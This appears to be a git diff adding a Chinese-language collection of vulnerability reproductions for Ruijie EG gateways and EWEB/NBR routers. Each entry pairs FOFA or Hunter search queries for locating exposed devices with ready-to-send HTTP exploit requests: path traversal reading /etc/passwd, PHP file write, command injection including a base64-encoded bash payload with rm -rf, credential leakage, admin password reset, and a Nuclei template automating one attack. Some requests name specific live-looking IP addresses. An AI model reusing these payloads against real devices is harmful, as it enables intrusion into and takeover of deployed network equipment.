+锐捷 EG易网关  
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**  
+<font style="color:rgb(38, 38, 38);">●登录页面</font>
+
+<font style="color:rgb(38, 38, 38);">fofa:</font>`app="Ruijie-EG易网关" `
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/cg41HdOksJkEBK3T/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-093813.webp)
+
+![1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48.png](./img/cg41HdOksJkEBK3T/1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48-161741.png)
+
+  
+**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**  
+1通过弱口令或账号密码泄露漏洞登录后台获取cookie  
+
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/cg41HdOksJkEBK3T/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-847404.webp)
+
+2通过上一步获取的cookie执行
+
+```plain
+/download.php?a=read_txt&file=../../../../etc/passwd
+```
+
+![1711946009120-be7d5122-2ffc-4924-bd6c-4f4a8758dc0c.png](./img/cg41HdOksJkEBK3T/1711946009120-be7d5122-2ffc-4924-bd6c-4f4a8758dc0c-947085.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ecv5820erlgsur8o>
\ No newline at end of file
diff --git a/锐捷EG易网关export后台任意文件写入.md b/锐捷EG易网关export后台任意文件写入.md
new file mode 100644
index 0000000..6dc80b8
--- /dev/null
+++ b/锐捷EG易网关export后台任意文件写入.md
@@ -0,0 +1,47 @@
+# 锐捷EG易网关export后台任意文件写入
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷EG易网关timeout.php后台任意文件读取漏洞 </font>
+
+**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+锐捷 EG易网关  
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**  
+<font style="color:rgb(38, 38, 38);">●登录页面</font>
+
+<font style="color:rgb(38, 38, 38);">fofa:</font>`app="Ruijie-EG易网关" `
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/vMasNoG8fS1LMggm/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-994856.webp)
+
+![1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48.png](./img/vMasNoG8fS1LMggm/1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48-136735.png)
+
+  
+**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**  
+1通过弱口令或账号密码泄露漏洞登录后台获取cookie  
+
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/vMasNoG8fS1LMggm/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-475248.webp)
+
+2通过上一步获取的cookie执行命令
+
+```plain
+POST /vwan_pi/export.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin
+X-Requested-With: XMLHttpRequest
+Host: 117.40.253.197:4430
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 53
+
+content=<?php phpinfo();?>&filename=../../html/oo.php
+```
+
+![1714062627441-f53045aa-fcb5-455f-9c4c-611f093e6e5c.png](./img/vMasNoG8fS1LMggm/1714062627441-f53045aa-fcb5-455f-9c4c-611f093e6e5c-894916.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rohc9xgqqcvcb1xr>
\ No newline at end of file
diff --git a/锐捷EG易网关login.php敏感信息泄露.md b/锐捷EG易网关login.php敏感信息泄露.md
new file mode 100644
index 0000000..237a288
--- /dev/null
+++ b/锐捷EG易网关login.php敏感信息泄露.md
@@ -0,0 +1,33 @@
+# 锐捷EG易网关login.php敏感信息泄露
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷EG易网关login.php敏感信息泄露</font>
+
+<font style="color:rgb(38, 38, 38);"> </font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+`锐捷EG易网关`  
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+`app="Ruijie-EG易网关"`  
+<font style="color:rgb(38, 38, 38);">●登录页面</font>  
+
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/3r1OYFKri8pFVNj6/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-740715.webp)
+
+  
+**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**
+
+```plain
+/login.php?a=version
+```
+
+![1714062137801-14ec6519-721d-482a-af0f-bd5e95ec7720.png](./img/3r1OYFKri8pFVNj6/1714062137801-14ec6519-721d-482a-af0f-bd5e95ec7720-406616.png)
+
+  
+ 
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iml6w4zwphpk4t97>
\ No newline at end of file
diff --git a/锐捷EG易网关networksafe远程代码执行漏洞.md b/锐捷EG易网关networksafe远程代码执行漏洞.md
new file mode 100644
index 0000000..f261820
--- /dev/null
+++ b/锐捷EG易网关networksafe远程代码执行漏洞.md
@@ -0,0 +1,52 @@
+# 锐捷EG易网关networksafe远程代码执行漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷 EG易网关cli存在后台远程命令执行漏洞。</font>
+
+<font style="color:rgb(38, 38, 38);"> </font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+`锐捷EG易网关`  
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+`app="Ruijie-EG易网关"`  
+<font style="color:rgb(38, 38, 38);">●登录页面</font>  
+
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/95uANgjLfxI8FBL-/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-688088.webp)
+
+  
+**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**  
+1、通过弱口令或账号密码泄露漏洞登录后台获取cookie  
+
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/95uANgjLfxI8FBL-/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-937391.webp)
+
+```plain
+POST /itbox_pi/networksafe.php?a=set HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin
+X-Requested-With: XMLHttpRequest
+Host: 117.40.253.197:4430
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 23
+
+bandwidth=|id >nice.txt
+```
+
+![1714062988720-d555b428-cc56-4327-8549-75c4e54bcf23.png](./img/95uANgjLfxI8FBL-/1714062988720-d555b428-cc56-4327-8549-75c4e54bcf23-448577.png)
+
+写入文件地址
+
+```plain
+/itbox_pi/nice.txt
+```
+
+![1714063009386-90ee202d-ad27-463e-8bd7-d83f66ef9d7a.png](./img/95uANgjLfxI8FBL-/1714063009386-90ee202d-ad27-463e-8bd7-d83f66ef9d7a-378601.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ss4hw3pc2v25kryp>
\ No newline at end of file
diff --git a/锐捷EG易网关phpinfo.view.php信息泄露漏洞.md b/锐捷EG易网关phpinfo.view.php信息泄露漏洞.md
new file mode 100644
index 0000000..d3a30c4
--- /dev/null
+++ b/锐捷EG易网关phpinfo.view.php信息泄露漏洞.md
@@ -0,0 +1,31 @@
+# 锐捷 EG易网关phpinfo.view.php 信息泄露漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷 EG易网关</font><font style="color:rgba(0, 0, 0, 0.9);">存在未经身份验证获取敏感信息</font>
+
+**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);background-color:rgb(250, 250, 250);">锐捷EG易网关</font>
+
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(35, 41, 48);background-color:rgb(250, 250, 250);">app</font><font style="color:rgb(225, 0, 35);background-color:rgb(250, 250, 250);">=</font><font style="color:rgb(102, 153, 0);background-color:rgb(250, 250, 250);">"Ruijie-EG易网关"</font>
+
+<font style="color:rgb(38, 38, 38);">●登录页面</font><font style="color:rgb(38, 38, 38);">  
+</font>
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/uLGTd_9BkwaR0Vvx/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-535279.webp)
+
+<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**<font style="color:rgb(38, 38, 38);"></font>
+
+```plain
+/tool/view/phpinfo.view.php
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font>
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kehikp7lablbdsec>
\ No newline at end of file
diff --git a/锐捷EG易网关timeout.php后台任意文件读取漏洞.md b/锐捷EG易网关timeout.php后台任意文件读取漏洞.md
new file mode 100644
index 0000000..9110e91
--- /dev/null
+++ b/锐捷EG易网关timeout.php后台任意文件读取漏洞.md
@@ -0,0 +1,47 @@
+# 锐捷EG易网关timeout.php后台任意文件读取漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷EG易网关timeout.php后台任意文件读取漏洞 </font>
+
+**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+锐捷 EG易网关  
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**  
+<font style="color:rgb(38, 38, 38);">●登录页面</font>
+
+<font style="color:rgb(38, 38, 38);">fofa:</font>`app="Ruijie-EG易网关" `
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/yxrLThOg1twrBoJM/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-724511.webp)
+
+![1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48.png](./img/yxrLThOg1twrBoJM/1711943727100-3a29a6a6-7b50-4246-af35-4ebf47636d48-662596.png)
+
+  
+**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**  
+1通过弱口令或账号密码泄露漏洞登录后台获取cookie  
+
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/yxrLThOg1twrBoJM/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-386082.webp)
+
+2通过上一步获取的cookie执行命令
+
+```plain
+POST /system_pi/timeout.php?a=getFile HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin
+X-Requested-With: XMLHttpRequest
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 22
+
+fileName=../etc/passwd
+```
+
+![1714062449229-3cce8ba1-8f09-4704-bcf3-73117674ac5a.png](./img/yxrLThOg1twrBoJM/1714062449229-3cce8ba1-8f09-4704-bcf3-73117674ac5a-281506.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oyykknetnegphzzm>
\ No newline at end of file
diff --git a/锐捷EG易网关vpn_quickset_service远程代码执行漏洞.md b/锐捷EG易网关vpn_quickset_service远程代码执行漏洞.md
new file mode 100644
index 0000000..3928408
--- /dev/null
+++ b/锐捷EG易网关vpn_quickset_service远程代码执行漏洞.md
@@ -0,0 +1,52 @@
+# 锐捷EG易网关vpn_quickset_service远程代码执行漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷 EG易网关cli存在后台远程命令执行漏洞。</font>
+
+<font style="color:rgb(38, 38, 38);"> </font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+`锐捷EG易网关`  
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+`app="Ruijie-EG易网关"`  
+<font style="color:rgb(38, 38, 38);">●登录页面</font>  
+
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/u1f031-bFfjq_s9P/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-921195.webp)
+
+  
+**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**  
+1、通过弱口令或账号密码泄露漏洞登录后台获取cookie  
+
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/u1f031-bFfjq_s9P/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-254245.webp)
+
+```plain
+POST /itbox_pi/vpn_quickset_service.php?a=set_vpn HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=bnrul7jabde55u5moo2a4q57a0; helpKey=home_sys;user=admin
+X-Requested-With: XMLHttpRequest
+Host: 117.40.253.197:4430
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 27
+
+ip=|cat /etc/passwd >1.txt|
+```
+
+![1714062843270-2d58deca-03fd-4c15-9993-9bfa44ecc958.png](./img/u1f031-bFfjq_s9P/1714062843270-2d58deca-03fd-4c15-9993-9bfa44ecc958-431455.png)
+
+写入文件地址
+
+```plain
+/itbox_pi/1.txt
+```
+
+![1714062857083-b23e439d-73d8-4c6c-a7e5-533d044e9763.png](./img/u1f031-bFfjq_s9P/1714062857083-b23e439d-73d8-4c6c-a7e5-533d044e9763-938105.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xaqqf2rq9u5lwp76>
\ No newline at end of file
diff --git a/锐捷EG易网关wifi.php存在后台远程命令执行漏洞.md b/锐捷EG易网关wifi.php存在后台远程命令执行漏洞.md
new file mode 100644
index 0000000..4eb6274
--- /dev/null
+++ b/锐捷EG易网关wifi.php存在后台远程命令执行漏洞.md
@@ -0,0 +1,49 @@
+# 锐捷 EG易网关wifi.php存在后台远程命令执行漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">锐捷 EG易网关cli存在后台远程命令执行漏洞。  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+```java
+锐捷EG易网关
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+```java
+app="Ruijie-EG易网关"
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">●登录页面</font>
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/gsYMn6zWg3mjpLNP/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-492488.png)
+
+# <font style="color:rgb(38, 38, 38);">四、漏洞复现</font>
+1. 通过弱口令或账号密码泄露漏洞登录后台获取cookie
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/gsYMn6zWg3mjpLNP/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-000905.png)
+
+2. 通过上一步获取的cookie执行命令
+
+```java
+POST /itbox_pi/wifi.php?a=branch_wifi HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=ihvlofd9j5bfjbikfrtng7p9f5; helpKey=home_sys;user=admin
+X-Requested-With: XMLHttpRequest
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 16
+
+province=|whoami
+```
+
+![1714060259608-a34db878-2cb8-4637-b828-d46fdaf7a329.png](./img/gsYMn6zWg3mjpLNP/1714060259608-a34db878-2cb8-4637-b828-d46fdaf7a329-361904.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vvrupv8a2wx05wyc>
\ No newline at end of file
diff --git a/锐捷EG易网关管理员账号密码泄露漏洞.md b/锐捷EG易网关管理员账号密码泄露漏洞.md
new file mode 100644
index 0000000..80fbf09
--- /dev/null
+++ b/锐捷EG易网关管理员账号密码泄露漏洞.md
@@ -0,0 +1,46 @@
+# 锐捷 EG易网关管理员账号密码泄露漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">锐捷EG易网关 login.php存在 CLI命令注入，导致管理员账号密码泄露漏洞  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+```java
+锐捷EG易网关
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+```java
+app="Ruijie-EG易网关"
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">●登录页面</font>
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/MxcQgnIcXQfNL8qR/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-391281.png)
+
+<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**<font style="color:rgb(38, 38, 38);"></font>
+
+```java
+POST /login.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 49
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+username=admin&password=admin?show+webmaster+user
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font>![1710773369558-0b735db6-3ccf-4af3-9aaf-4ba360e3dd91.png](./img/MxcQgnIcXQfNL8qR/1710773369558-0b735db6-3ccf-4af3-9aaf-4ba360e3dd91-254157.png)
+
+![1710774024223-cd35f9b5-4b70-45e0-abf7-47aeefe164d6.png](./img/MxcQgnIcXQfNL8qR/1710774024223-cd35f9b5-4b70-45e0-abf7-47aeefe164d6-268712.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ewl6ikmuyvguq1ps>
\ No newline at end of file
diff --git a/锐捷EWEBflwo.contro存在远程命令执行漏洞.md b/锐捷EWEBflwo.contro存在远程命令执行漏洞.md
new file mode 100644
index 0000000..b6464f9
--- /dev/null
+++ b/锐捷EWEBflwo.contro存在远程命令执行漏洞.md
@@ -0,0 +1,111 @@
+# 锐捷EWEB flwo.contro存在远程命令执行漏洞
+
+# 一、漏洞简介
+锐捷EWEB flwo.contro存在远程命令执行漏洞
+
+# 二、影响版本
++ 锐捷NBR路由器
+
+# 三、资产测绘
++ hunter`app.name=="Ruijie 锐捷 EWEB"`
++ fofa`title="锐捷网络-EWEB网管系统"`
++ 登录页面![1715322581874-fa3273b6-555a-497f-a4ef-ba0b586cab54.png](./img/TFOZ7WRYk6ynbZLx/1715322581874-fa3273b6-555a-497f-a4ef-ba0b586cab54-866973.png)
+
+# 四、漏洞复现
+ 先发送数据包，获取cookie  
+
+```http
+POST /ddi/server/login.php HTTP/1.1
+Host: 127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 
+
+username=admin&password=admin?
+```
+
+![1715323041665-52c124a1-a313-42dd-8797-fe5f1386b46c.png](./img/TFOZ7WRYk6ynbZLx/1715323041665-52c124a1-a313-42dd-8797-fe5f1386b46c-753050.png)
+
+ 使用获取cookie执行命令  
+
+```http
+cm0gLXJmIC4uL2lrbTEyMy50eHQgJiYgZWNobyBIZWxsb1dvcmxkID4gLi4vaWttMTIzLnR4dCAyPiYx 
+Bsae64解码
+rm -rf ../ikm123.txt && echo HelloWorld > ../ikm123.txt 2>&1
+```
+
+```http
+POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0
+Connection: close
+Content-Length: 160
+Content-Type: application/x-www-form-urlencoded
+Cookie: RUIJIEID=e3t2n743strq8lu1anqod3bhu6;
+Accept-Encoding: gzip
+
+type=%7Cbash+-c+%27echo+cm0gLXJmIC4uL2lrbTEyMy50eHQgJiYgZWNobyBIZWxsb1dvcmxkID4gLi4vaWttMTIzLnR4dCAyPiYx+%7C+base64+-d+%7C+bash+%26%26+exit+0%27
+```
+
+![1715323240193-01afe809-d76e-4d69-8be8-d16470a63556.png](./img/TFOZ7WRYk6ynbZLx/1715323240193-01afe809-d76e-4d69-8be8-d16470a63556-647634.png)
+
+ 3、命令执行成功 
+
+```http
+/ikm123.txt
+```
+
+![1715323343958-2af6502d-a935-4e8d-8360-dcf53b32a982.png](./img/TFOZ7WRYk6ynbZLx/1715323343958-2af6502d-a935-4e8d-8360-dcf53b32a982-871259.png)
+
+## 五、 Nuclei
+```http
+id: RJEWEB-flwo-contro-RCE
+
+info:
+  name: 锐捷 EWEB-RCE-flwo.contro
+  author: haoguoguo
+  severity: high
+  metadata: 
+    fofa-query: title="锐捷网络-EWEB网管系统"
+variables:
+  filename: "{{to_lower(rand_base(5))}}"
+  boundary: "{{to_lower(rand_base(20))}}"
+http:
+  - raw:
+      - |
+        POST /ddi/server/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 
+
+        username=admin&password=admin?
+
+      - |
+        POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0
+        Connection: close
+        Content-Length: 160
+        Content-Type: application/x-www-form-urlencoded
+        Accept-Encoding: gzip
+
+        type=%7Cbash+-c+%27echo+{{base64("rm -rf ../{{filename}}.txt && echo HelloWorld > ../{{filename}}.txt 2>&1")}}+%7C+base64+-d+%7C+bash+%26%26+exit+0%27
+
+      - |
+        GET /{{filename}}.txt HTTP/1.1
+        Host:{{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+        Content-Length: 0
+
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code==200 && contains_all(body,"HelloWorld")
+```
+
+![1715322761109-4303e648-4b49-4d38-8c6e-cb1348e035dc.png](./img/TFOZ7WRYk6ynbZLx/1715322761109-4303e648-4b49-4d38-8c6e-cb1348e035dc-278160.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wqfe5713gy2pdu2v>
\ No newline at end of file
diff --git a/锐捷EWEB路由器auth远程命令执行漏洞.md b/锐捷EWEB路由器auth远程命令执行漏洞.md
new file mode 100644
index 0000000..fe9abcf
--- /dev/null
+++ b/锐捷EWEB路由器auth远程命令执行漏洞.md
@@ -0,0 +1,38 @@
+# 锐捷 EWEB路由器 auth 远程命令执行漏洞
+
+# 一、漏洞简介
+锐捷睿易是锐捷网络面向商务市场的子品牌。拥有便捷的网络、交换机、路由器、无线、安全、云服务六大产品线，解决方案涵盖商业零售、酒店、kt、网吧、监控与安全、物流、仓储、制造。通过该漏洞，攻击者可以任意执行服务器端的代码，编写后门，获得服务器权限，进而控制整个web服务器。
+
+# 二、影响版本
++ 锐捷 EWEB路由器
+
+# 三、资产测绘
++ fofa`body="cgi-bin/luci" && body="#f47f3e"`
++ 特征
+
+![1709883604157-a88eaed0-f449-414c-86ab-4951422896ee.png](./img/jMJPLGwCvErQjGMK/1709883604157-a88eaed0-f449-414c-86ab-4951422896ee-226270.png)
+
+# 四、漏洞复现
+```plain
+POST /cgi-bin/luci/api/auth HTTP/1.1
+Host: 
+Content-Type: application/json
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+
+{"method":"checkNet","params":{"host":"`echo c149136B>AD0D5b8c.txt`"}}
+```
+
+![1709883649047-81989889-fb44-46a7-bfdc-3850b3fdc6f4.png](./img/jMJPLGwCvErQjGMK/1709883649047-81989889-fb44-46a7-bfdc-3850b3fdc6f4-707818.png)
+
+获取命令执行结果
+
+```plain
+/cgi-bin/AD0D5b8c.txt
+```
+
+![1709883674250-cfa2c2d1-6da8-4b48-9091-344fac04b808.png](./img/jMJPLGwCvErQjGMK/1709883674250-cfa2c2d1-6da8-4b48-9091-344fac04b808-337780.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vx00xdatfw3yw8px>
\ No newline at end of file
diff --git a/锐捷NBR系列多款路由器存在管理员密码重置漏洞.md b/锐捷NBR系列多款路由器存在管理员密码重置漏洞.md
new file mode 100644
index 0000000..42ee11d
--- /dev/null
+++ b/锐捷NBR系列多款路由器存在管理员密码重置漏洞.md
@@ -0,0 +1,43 @@
+# 锐捷NBR系列多款路由器存在管理员密码重置漏洞
+
+**一、漏洞简介**  
+<font style="color:rgb(34, 34, 34);">锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在存在管理员密码重置漏洞，攻击者通过漏洞重置密码登录后台</font>  
+**二、影响版本**
+
+Ruijie-NBR路由器
+
+**三、资产测绘**
+
+```plain
+body="上层网络出现异常，请检查外网线路或联系ISP运营商协助排查"
+```
+
+![1717734645117-802010e5-a75c-45f1-8f4c-551281d27278.png](./img/kB-drvIkcHwBbcTn/1717734645117-802010e5-a75c-45f1-8f4c-551281d27278-249342.png)
+
+  
+**四、漏洞复现**
+
+```plain
+GET /base_network.asp?isbase64=1&reboot=1&shortset=1&time_type=auto&exec_service=ntpc-restart&http_lanport=80&remote_management=1&http_wanport=9999&http_username=admin&http_gname_en=0&http_passwd=admin&_= HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Referer: 111.59.193.189:9999/index.htm?_1708839153
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: wys_userid=; userid=admin; gw_userid=admin,gw_passwd=
+Connection: close
+```
+
+![1717734727800-954b048d-0b4f-45f0-af30-40f0e26df8af.png](./img/kB-drvIkcHwBbcTn/1717734727800-954b048d-0b4f-45f0-af30-40f0e26df8af-577558.png)
+
+```plain
+使用admin/admin登录系统
+```
+
+![1717735035159-6a15be6b-d351-4ebd-bce1-f071a0f688c8.png](./img/kB-drvIkcHwBbcTn/1717735035159-6a15be6b-d351-4ebd-bce1-f071a0f688c8-178013.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/em4uexuiwqtgq0ey>
\ No newline at end of file
diff --git a/锐捷NBR路由器fileupload.php任意文件上传漏洞.md b/锐捷NBR路由器fileupload.php任意文件上传漏洞.md
new file mode 100644
index 0000000..dedb46d
--- /dev/null
+++ b/锐捷NBR路由器fileupload.php任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+# 锐捷NBR路由器fileupload.php任意文件上传漏洞
+
+# 一、漏洞简介
+锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写，意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能，适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞，可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。
+
+# 二、影响版本
++ 锐捷NBR路由器
+
+# 三、资产测绘
++ hunter`app.name=="Ruijie 锐捷 EWEB"`
++ 登录页面
+
+![1693802366372-530b8f97-01f8-4fac-a782-d3306d3ea54e.png](./img/jFBa7SreAbBovuDn/1693802366372-530b8f97-01f8-4fac-a782-d3306d3ea54e-629998.png)
+
+# 四、漏洞复现
+```plain
+POST /ddi/server/fileupload.php HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
